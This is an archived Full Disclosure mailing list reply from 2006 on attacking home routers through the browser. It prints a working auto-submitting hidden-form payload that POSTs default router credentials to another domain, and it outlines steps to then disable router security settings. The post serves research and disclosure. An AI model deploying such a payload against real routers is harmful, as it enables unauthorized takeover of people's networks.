Full Disclosure mailing list archives
Re: Attacking the local LAN via XSS
From: Thor Larholm <thor () polypath com>
Date: Fri, 04 Aug 2006 13:53:38 +0200
pdp (architect) wrote:
HTTP PORT is not possible on domain different from the current domain, unless browser hacks is employed.
I'm guessing you mean HTTP POST :)You can definitely POST any FORM to a third party domain without hacks just by calling the submit() method of your FORM which targets a hidden iframe. e.g.
<iframe style="display:none" id="thirdparty" name="thirdparty"></iframe><form name="myform" action="http://whatever.com/foo.bar" method="POST" target="thirdparty">
<input type="text" name="username" value="r00t"> <input type="text" name="password" value="default router password"> </form> <script>document.myform.submit()</script>The sequence of events would be to 1) Identify the router, 2) POST a login request with known default logins and 3) POST a change request to e.g. disable security settings or open a trust relationship.
The only time consuming part is gathering router identification traits and tailoring login and change requests to specific router vendors.
-- Thor Larholm _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Attacking the local LAN via XSS, (continued)
- Re: Attacking the local LAN via XSS Siim Põder (Aug 04)
- Re: Attacking the local LAN via XSS Thierry Zoller (Aug 04)
- Re: Attacking the local LAN via XSS pdp (architect) (Aug 04)
- Re[2]: Attacking the local LAN via XSS Thierry Zoller (Aug 04)
- Re: Re[2]: Attacking the local LAN via XSS pdp (architect) (Aug 04)
- Re: Attacking the local LAN via XSS Nikolay Kubarelov (Aug 07)
- Re: Attacking the local LAN via XSS Dude VanWinkle (Aug 08)
- Re: Attacking the local LAN via XSS pdp (architect) (Aug 04)
- Re: Attacking the local LAN via XSS pdp (architect) (Aug 04)
- Re: Attacking the local LAN via XSS Thor Larholm (Aug 04)
- Re: Attacking the local LAN via XSS pdp (architect) (Aug 04)